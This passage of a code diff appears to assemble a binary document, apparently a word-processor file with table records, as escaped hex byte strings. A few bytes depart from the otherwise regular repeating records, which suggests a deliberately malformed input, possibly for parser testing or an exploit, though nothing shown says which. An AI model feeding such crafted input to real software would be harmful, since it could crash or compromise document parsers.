+"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00"
+"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00"
+"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x14\xf6\x01"
+"\x00\x00\x17\xf6\x03\x00\x00\x18\xf6\x03\x00\x00\x1a\xd6\x18\x00"
+"\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00"
+"\x00\x00\xff\x00\x00\x00\xff\x1b\xd6\x18\x00\x00\x00\xff\x00\x00"
+"\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00"
+"\x00\xff\x1c\xd6\x18\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00"
+"\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x1d\xd6\x18"
+"\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff"
+"\x00\x00\x00\xff\x00\x00\x00\xff\x34\xd6\x06\x00\x01\x0a\x03\x46"
+"\x00\x61\xf6\x03\x00\x00\x0c\x00\x00\x03\x24\x01\x12\x64\x24\xff"
+"\x00\x00\x16\x24\x01\x49\x66\x01\x00\x00\x00\x61\x24\x01\x00\x06"
+"\xd2\x76\x00\x00\xdd\x76\x00\x00\xec\x76\x00\x00\xf5\x76\x00\x00"
+"\x03\x77\x00\x00\x04\x77\x00\x00\x07\x77\x00\x00\xf3\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x7e\x00\x00\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x35\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf3\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbd\x00\x00\x6b\x64"
+"\x46\x20\x00\x00\x16\x24\x01\x17\x24\x01\x49\x66\x01\x00\x00\x00"
+"\x02\x96\x46\x00\x05\xd6\x18\x04\x01\x00\x00\x04\x01\x00\x00\x04"
+"\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x08"
+"\xd6\x88\x00\x06\xba\xff\x0d\x03\xcf\x08\xab\x11\x08\x18\x57\x1f"
+"\x7b\x25\x00\x06\x53\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x06\xc2\x05\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\xdc\x08\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06"
+"\x5d\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x06\x4f\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x06\x5d\x06\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x13\xd6\x30\x00\x00\x00"
+"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00"
+"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00"
+"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x14\xf6\x01"
+"\x00\x00\x17\xf6\x03\x00\x00\x18\xf6\x03\x00\x00\x1a\xd6\x18\x00"
+"\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00"
+"\x00\x00\xff\x00\x00\x00\xff\x1b\xd6\x18\x00\x00\x00\xff\x00\x00"
+"\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00"
+"\x00\xff\x1c\xd6\x18\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00"
+"\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x1d\xd6\x18"
+"\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff"
+"\x00\x00\x00\xff\x00\x00\x00\xff\x34\xd6\x06\x00\x01\x0a\x03\x46"
+"\x00\x61\xf6\x03\x00\x00\x0c\x00\x00\x03\x24\x01\x12\x64\x24\xff"
+"\x00\x00\x16\x24\x01\x49\x66\x01\x00\x00\x00\x61\x24\x01\x00\x06"
+"\x07\x77\x00\x00\x0b\x77\x00\x00\x15\x77\x00\x00\x24\x77\x00\x00"
+"\x2e\x77\x00\x00\x3c\x77\x00\x00\x3d\x77\x00\x00\xf3\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x35\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbd\x00\x00\x6b\x64"
+"\x39\x21\x00\x00\x16\x24\x01\x17\x24\x01\x49\x66\x01\x00\x00\x00"
+"\x02\x96\x46\x00\x05\xd6\x18\x04\x01\x00\x00\x04\x01\x00\x00\x04"
+"\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x08"
+"\x17\x88\x00\x06\xba\xff\x0d\x03\xcf\x08\xab\x11\x08\x18\x57\x1f"
+"\xb4\x25\x00\x06\x53\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x06\xc2\x05\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\xdc\x08\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06"
+"\x5d\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x06\x4f\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x06\x5d\x06\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x13\xd6\x30\x00\x00\x00"
+"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00"
+"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00"
+"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x14\xf6\x01"
+"\x00\x00\x6d\xf6\x03\x00\x00\x18\xf6\x03\x00\x00\x1a\xd6\x18\x00"
+"\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00"
+"\x00\x00\xff\x00\x00\x00\xff\x1b\xd6\x18\x00\x00\x00\xff\x00\x00"
+"\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00"
+"\x00\xff\x1c\xd6\x18\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00"
+"\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x1d\xd6\x18"
+"\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff"
+"\x00\x00\x00\xff\x00\x00\x00\xff\x34\xd6\x06\x00\x01\x0a\x03\x46"
+"\x00\x61\xf6\x03\x00\x00\x0c\x00\x00\x03\x24\x01\x12\x64\x24\xff"
+"\x00\x00\x16\x24\x01\x49\x66\x01\x00\x00\x00\x61\x24\x01\x00\x06"
+"\x3d\x77\x00\x00\x3e\x77\x00\x00\xc8\x77\x00\x00\xac\x78\x00\x00"
+"\x4b\x79\x00\x00\x6f\x79\x00\x00\xdd\x79\x00\x00\xde\x79\x00\x00"
+"\x1f\x7a\x00\x00\x63\x7a\x00\x00\x64\x7a\x00\x00\x92\x7a\x00\x00"
+"\x58\x7b\x00\x00\x59\x7b\x00\x00\x8a\x7b\x00\x00\xb1\x7b\x00\x00"
+"\xdf\x7b\x00\x00\xf0\x7b\x00\x00\x06\x7c\x00\x00\x17\x7c\x00\x00"
+"\x18\x7c\x00\x00\x19\x7c\x00\x00\x1a\x7c\x00\x00\xf7\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\xec\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\xec\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\xd8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd8\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd0"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xcb\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xcb\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\xc3\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\xc1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\xc1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd0\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x01\x00\x00\x00\x07\x16\x00\x03\x24\x02\x61\x24\x02"
+"\x67\x64\xa5\x49\x73\x00\x00\x04\x16\x00\x03\x24\x02\x61\x24\x02"
+"\x00\x07\x00\x00\x03\x24\x02\x12\x64\x10\xff\x00\x00\x61\x24\x02"
+"\x00\x13\x00\x00\x03\x24\x01\x0d\xc6\x05\x00\x01\x68\x01\x00\x0f"
+"\x84\x65\x01\x11\x84\x9b\xfe\x12\x64\x68\x01\x01\x00\x5e\x84\x65"
+"\x01\x60\x84\x9b\xfe\x61\x24\x01\x00\x0a\x00\x00\x03\x24\x03\x12"
+"\x64\x38\xff\x00\x00\x61\x24\x03\x67\x64\x02\x75\x3b\x00\x00\x07"
+"\x00\x00\x03\x24\x03\x12\x64\x38\xff\x00\x00\x61\x24\x03\x00\x16"
+"\xfd\x7b\x00\x00\xfe\x7b\x00\x00\xff\x7b\x00\x00\x04\x7c\x00\x00"
+"\x05\x7c\x00\x00\x18\x7c\x00\x00\x19\x7c\x00\x00\x1a\x7c\x00\x00"
+"\xf4\xea\xe5\xdf\xdb\xd7\xd3\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1e\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x06\x16\x68\x45\x6d\x47\x00\x00\x06\x16"
+"\x68\x02\x75\x3b\x00\x00\x06\x16\x68\x2e\x20\xb9\x00\x00\x0a\x16"
+"\x68\x2e\x20\xb9\x00\x30\x4a\x17\x00\x00\x09\x16\x68\x2e\x20\xb9"
+"\x00\x68\x08\x00\x13\x03\x6a\x00\x00\x00\x00\x16\x68\x2e\x20\xb9"
+"\x00\x30\x4a\x17\x00\x55\x08\x01\x15\x16\x68\x02\x75\x3b\x00\x30"
+"\x4a\x17\x00\x6d\x48\x00\x04\x6e\x48\x00\x04\x75\x08\x01\x00\x07"
+"\x27\x00\x12\x30\x00\x1c\x50\x01\x00\x2f\x52\x20\x00\x1f\xb0\x81"
+"\x2e\x20\xb0\xc5\x41\x21\xb0\x89\x05\x22\xb0\x52\x03\x23\x90\x52"
+"\x03\x24\x90\x52\x03\x25\xb0\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\xf1\x00\x16\x24\x01\x17\x24\x01\x49\x66\x01\x00\x00\x00\x01\x96"
+"\x00\x00\x21\x76\x00\x06\x68\x01\x35\xd6\x05\x00\x01\x03\x53\x03"
+"\x35\xd6\x05\x01\x02\x03\xc2\x05\x35\xd6\x05\x02\x03\x03\xdc\x08"
+"\x35\xd6\x05\x03\x04\x03\x5d\x06\x35\xd6\x05\x04\x05\x03\x4f\x07"
+"\x35\xd6\x05\x05\x06\x03\x5d\x06\x23\x76\x00\x01\x53\x03\x23\x76"
+"\x01\x02\xc2\x05\x23\x76\x02\x03\xdc\x08\x23\x76\x03\x04\x5d\x06"
+"\x23\x76\x04\x05\x4f\x07\x23\x76\x05\x06\x5d\x06\x3a\x56\x0b\x00"
+"\x02\x96\x46\x00\x13\xd6\x30\x00\x00\x00\xff\x04\x01\x00\x00\x00"
+"\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00"
+"\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00"
+"\x00\x00\xff\x04\x01\x00\x00\x14\xf6\x01\x00\x00\x18\xf6\x03\x00"
+"\x00\x35\xd6\x05\x00\x01\x03\x53\x03\x35\xd6\x05\x01\x02\x03\xc2"
+"\x05\x35\xd6\x05\x02\x03\x03\xdc\x08\x35\xd6\x05\x03\x04\x03\x5d"
+"\x06\x35\xd6\x05\x04\x05\x03\x4f\x07\x35\xd6\x05\x05\x06\x03\x5d"
+"\x06\x34\xd6\x06\x00\x01\x05\x00\x00\x00\x34\xd6\x06\x00\x01\x0a"
+"\x03\x46\x00\xf1\x00\x16\x24\x01\x17\x24\x01\x49\x66\x01\x00\x00"
+"\x00\x01\x96\x00\x00\x21\x76\x00\x06\x68\x01\x35\xd6\x05\x00\x01"
+"\x03\x53\x03\x35\xd6\x05\x01\x02\x03\xc2\x05\x35\xd6\x05\x02\x03"
+"\x03\xdc\x08\x35\xd6\x05\x03\x04\x03\x5d\x06\x35\xd6\x05\x04\x05"
+"\x03\x4f\x07\x35\xd6\x05\x05\x06\x03\x5d\x06\x23\x76\x00\x01\x53"
+"\x03\x23\x76\x01\x02\xc2\x05\x23\x76\x02\x03\xdc\x08\x23\x76\x03"
+"\x04\x5d\x06\x23\x76\x04\x05\x4f\x07\x23\x76\x05\x06\x5d\x06\x3a"
+"\x56\x0b\x00\x02\x96\x46\x00\x13\xd6\x30\x00\x00\x00\xff\x04\x01"
+"\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01"
+"\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01"
+"\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x14\xf6\x01\x00\x00\x18"
+"\xf6\x03\x00\x00\x35\xd6\x05\x00\x01\x03\x53\x03\x35\xd6\x05\x01"
+"\x02\x03\xc2\x05\x35\xd6\x05\x02\x03\x03\xdc\x08\x35\xd6\x05\x03"
+"\x04\x03\x5d\x06\x35\xd6\x05\x04\x05\x03\x4f\x07\x35\xd6\x05\x05"
+"\x06\x03\x5d\x06\x34\xd6\x06\x00\x01\x05\x00\x00\x00\x34\xd6\x06"
+"\x00\x01\x0a\x03\x46\x00\xf1\x00\x16\x24\x01\x17\x24\x01\x49\x66"
+"\x01\x00\x00\x00\x01\x96\x00\x00\x21\x76\x00\x06\x68\x01\x35\xd6"
+"\x05\x00\x01\x03\x53\x03\x35\xd6\x05\x01\x02\x03\xc2\x05\x35\xd6"
+"\x05\x02\x03\x03\xdc\x08\x35\xd6\x05\x03\x04\x03\x5d\x06\x35\xd6"
+"\x05\x04\x05\x03\x4f\x07\x35\xd6\x05\x05\x06\x03\x5d\x06\x23\x76"
+"\x00\x01\x53\x03\x23\x76\x01\x02\xc2\x05\x23\x76\x02\x03\xdc\x08"
+"\x23\x76\x03\x04\x5d\x06\x23\x76\x04\x05\x4f\x07\x23\x76\x05\x06"
+"\x5d\x06\x3a\x56\x0b\x00\x02\x96\x46\x00\x13\xd6\x30\x00\x00\x00"
+"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00"
+"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00"
+"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x14\xf6\x01"
+"\x00\x00\x18\xf6\x03\x00\x00\x35\xd6\x05\x00\x01\x03\x53\x03\x35"
+"\xd6\x05\x01\x02\x03\xc2\x05\x35\xd6\x05\x02\x03\x03\xdc\x08\x35"
+"\xd6\x05\x03\x04\x03\x5d\x06\x35\xd6\x05\x04\x05\x03\x4f\x07\x35"
+"\xd6\x05\x05\x06\x03\x5d\x06\x34\xd6\x06\x00\x01\x05\x00\x00\x00"
+"\x34\xd6\x06\x00\x01\x0a\x03\x46\x00\xf1\x00\x16\x24\x01\x17\x24"
+"\x01\x49\x66\x01\x00\x00\x00\x01\x96\x00\x00\x21\x76\x00\x06\x68"
+"\x01\x35\xd6\x05\x00\x01\x03\x53\x03\x35\xd6\x05\x01\x02\x03\xc2"
+"\x05\x35\xd6\x05\x02\x03\x03\xdc\x08\x35\xd6\x05\x03\x04\x03\x5d"
+"\x06\x35\xd6\x05\x04\x05\x03\x4f\x07\x35\xd6\x05\x05\x06\x03\x5d"
+"\x06\x23\x76\x00\x01\x53\x03\x23\x76\x01\x02\xc2\x05\x23\x76\x02"
+"\x03\xdc\x08\x23\x76\x03\x92\x5d\x06\x23\x76\x04\x05\x4f\x07\x23"
+"\x76\x05\x06\x5d\x06\x3a\x56\x0b\x00\x02\x96\x46\x00\x13\xd6\x30"
+"\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00"
+"\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00"
+"\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00"
+"\x14\xf6\x01\x00\x00\x18\xf6\x03\x00\x00\x35\xd6\x05\x00\x01\x03"
+"\x53\x03\x35\xd6\x05\x01\x02\x03\xc2\x05\x35\xd6\x05\x02\x03\x03"
+"\xdc\x08\x35\xd6\x05\x03\x04\x03\x5d\x06\x35\xd6\x05\x04\x05\x03"
+"\x4f\x07\x35\xd6\x05\x05\x06\x03\x5d\x06\x34\xd6\x06\x00\x01\x05"
+"\x00\x00\x00\x34\xd6\x06\x00\x01\x0a\x03\x46\x00\xf1\x00\x16\x24"
+"\x01\x17\x24\x01\x49\x66\x01\x00\x00\x00\x01\x96\x00\x00\x21\x76"
+"\x00\x06\x68\x01\x35\xd6\x05\x00\x01\x03\x53\x03\x35\xd6\x05\x01"
+"\x02\x03\xc2\x05\x35\xd6\x05\x02\x03\x03\xdc\x08\x35\xd6\x05\x03"
+"\x04\x03\x5d\x06\x35\xd6\x05\x04\x05\x03\x4f\x07\x35\xd6\x05\x05"
+"\x06\x03\x5d\x06\x23\x76\x00\x01\x53\x03\x23\x76\x01\x02\xc2\x05"
+"\x23\x76\x02\x03\xdc\x08\x23\x76\x03\x04\x5d\x06\x23\x76\x04\x05"
+"\x4f\x07\x23\x76\x05\x06\x5d\x06\x3a\x56\x0b\x00\x02\x96\x46\x00"
+"\x13\xd6\x30\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04"
+"\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04"
+"\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04"
+"\x01\x00\x00\x14\xf6\x01\x00\x00\x18\xf6\x03\x00\x00\x35\xd6\x05"
+"\x00\x01\x03\x53\x03\x35\xd6\x05\x01\x02\x03\xc2\x05\x35\xd6\x05"
+"\x02\x03\x03\xdc\x08\x35\xd6\x05\x03\x04\x03\x5d\x06\x35\xd6\x05"
+"\x04\x05\x03\x4f\x07\x35\xd6\x05\x05\x06\x03\x5d\x06\x34\xd6\x06"
+"\x00\x01\x05\x00\x00\x00\x34\xd6\x06\x00\x01\x0a\x03\x46\x00\xf1"
+"\x00\x16\x24\x01\x5e\x24\x80\x49\x66\x01\x00\x00\x00\x01\x96\x00"
+"\x00\x21\x76\x00\x06\x68\x01\x35\xd6\x05\x00\x01\x03\x53\x03\x35"
+"\xd6\x05\x01\x02\x03\xc2\x05\x35\xd6\x05\x02\x03\x03\xdc\x08\x35"
+"\xd6\x05\x03\x04\x03\x5d\x06\x35\xd6\x05\x04\x05\x03\x4f\x07\x35"
+"\xd6\x05\x05\x06\x03\x5d\x06\x23\x76\x00\x01\x53\x03\x23\x76\x01"
+"\x02\xc2\x05\x23\x76\x02\x03\xdc\x08\x23\x76\x03\x04\x5d\x06\x23"
+"\x76\x04\x05\x4f\x07\x23\x76\x05\x06\x5d\x06\x3a\x56\x0b\x00\x02"
+"\x96\x46\x00\x13\xd6\x30\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00"
+"\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00"
+"\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00"
+"\x00\xff\x04\x01\x00\x00\x14\xf6\x01\x00\x00\x18\xf6\x03\x00\x00"
+"\x35\xd6\x05\x00\x01\x03\x53\x03\x35\xd6\x05\x01\x02\x03\xc2\x05"
+"\x35\xd6\x05\x02\x03\x03\xdc\x08\x35\xd6\x05\x03\x04\x03\x5d\x06"
+"\x35\xd6\x05\x04\x05\x03\x4f\x07\x35\xd6\x05\x05\x06\x03\x5d\x06"
+"\x34\xd6\x06\x00\x01\x05\x00\x00\x00\x34\xd6\x06\x00\x01\x0a\x03"
+"\x46\x00\xf1\x00\x16\x24\x01\x17\x24\x01\x49\x66\x01\x00\x00\x00"
+"\x01\x68\x00\x00\x21\x76\x00\x06\x68\x01\x35\xd6\x05\x00\x01\x03"
+"\x53\x03\x35\xd6\x05\x01\x02\x03\xc2\x05\x35\xd6\x05\x02\x03\x03"
+"\xdc\x08\x35\xd6\x05\x03\x04\x03\x5d\x06\x35\xd6\x05\x04\x05\x03"
+"\x4f\x07\x35\xd6\x05\x05\x06\x03\x5d\x06\x23\x76\x00\x01\x53\x03"
+"\x23\x76\x01\x02\xc2\x05\x23\x76\x02\x03\xdc\x08\x23\x76\x03\x04"
+"\x5d\x06\x23\x76\x04\x05\x4f\x07\x23\x76\x05\x06\x5d\x06\x3a\x56"
+"\x0b\x00\x02\x96\x46\x00\x13\xd6\x30\x00\x00\x00\xff\x04\x01\x00"
+"\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00"
+"\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00"
+"\x00\x00\x00\x00\xff\x04\x01\x00\x00\x14\xf6\x01\x00\x00\x18\xf6"
+"\x03\x00\x00\x35\xd6\x05\x00\x01\x03\x53\x03\x35\xd6\x05\x01\x02"
+"\x03\xc2\x05\x35\xd6\x05\x02\x03\x03\xdc\x08\x35\xd6\x05\x03\x04"
+"\x03\x5d\x06\x35\xd6\x05\x04\x05\x03\x4f\x07\x35\xd6\x05\x05\x06"
+"\x03\x5d\x06\x34\xd6\x06\x00\x01\x05\x00\x00\x00\x34\xd6\x06\x00"
